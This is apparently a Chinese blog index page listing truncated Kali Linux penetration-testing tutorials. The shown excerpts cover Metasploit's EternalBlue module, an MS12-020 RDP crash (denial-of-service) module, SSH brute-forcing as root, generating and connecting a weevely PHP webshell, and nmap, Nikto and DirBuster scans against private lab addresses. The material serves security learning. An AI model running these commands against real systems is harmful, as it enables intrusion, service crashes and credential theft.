KALI

【教程】msf基本命令

阅读(64)评论(0)

msfconsole基本命令 1.查找模块 search name 2.选择模块 use exploit/windows/smb/ms17_010_eternalblue 3.查看攻击范围(受影响主机) show targets 4.列出所有选项 show options ...

KALI

【教程】msf数据库基本命令

阅读(48)评论(0)

msf数据库基本命令 1.启动数据库 service postgresql start 2.查看数据库状态 service postgresql status 3.初始化数据库(这里已经提前初始化了,所以提示会不一样) msfdb init 4.查看是否连接成功 db_status ...

KALI

【教程】nmap扫描基础

阅读(41)评论(0)

nmap扫描基础 1.扫描存活主机(ping) nmap -sP 192.168.186.0/24 2.半开放式扫描 nmap -sS 192.168.186.129 3.不Ping式扫描 nmap -Pn 192.168.186.129 4.探测端口服务版本 nmap -sV 192.168.186.129 ...

KALI

【教程】ms12_020蓝屏攻击

阅读(36)评论(0)

metasploit蓝屏攻击 win2008 IP:192.168.186.129 (需开启3389端口) 1.启动msf msfconsole 2.选择攻击模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids ...

KALI

【教程】Nikto漏洞扫描

阅读(42)评论(0)

Nikto漏洞扫描基础 1.一般扫描 nikto -h http://172.16.1.102 -p 80 //可以看到apache版本号,php版本号等... 2.扫描cgi-bin目录 nikto -Cgidirs cgi-bin -h http://172.16.1.10...

KALI

【教程】metasploit爆破篇

阅读(33)评论(0)

metasploit爆破篇 爆破SSH 1.选择模块 use auxiliary/scanner/ssh/ssh_login 2.设置爆破参数 set rhosts 172.16.1.101 //爆破地址 set username root //设置用户名 ...

KALI

【教程】 Kali中的菜刀weevely

阅读(68)评论(0)

Kali里的中国菜刀 生成木马 weevely generate pass /root/shell.php //pass为shell密码,shell.php为shell文件名 连接webshell weevvely http://192.168.113.166:81/shell.php pas...

KALI

【教程】DirBuster暴力破解目录

阅读(62)评论(0)

DirBuster暴力破解目录 介绍:Kali Linux提供的目录扫描工具DirBuster支持全部的Web目录扫描方式。它既支持网页爬虫方式扫描,也支持基于字典暴力扫描,还支持纯暴力扫描。该工具使用Java语言编写,提供命令行(Headless)和图形界面(GUI)两种模式。其中,图形界面模式功能更为强大。用户不仅可以指...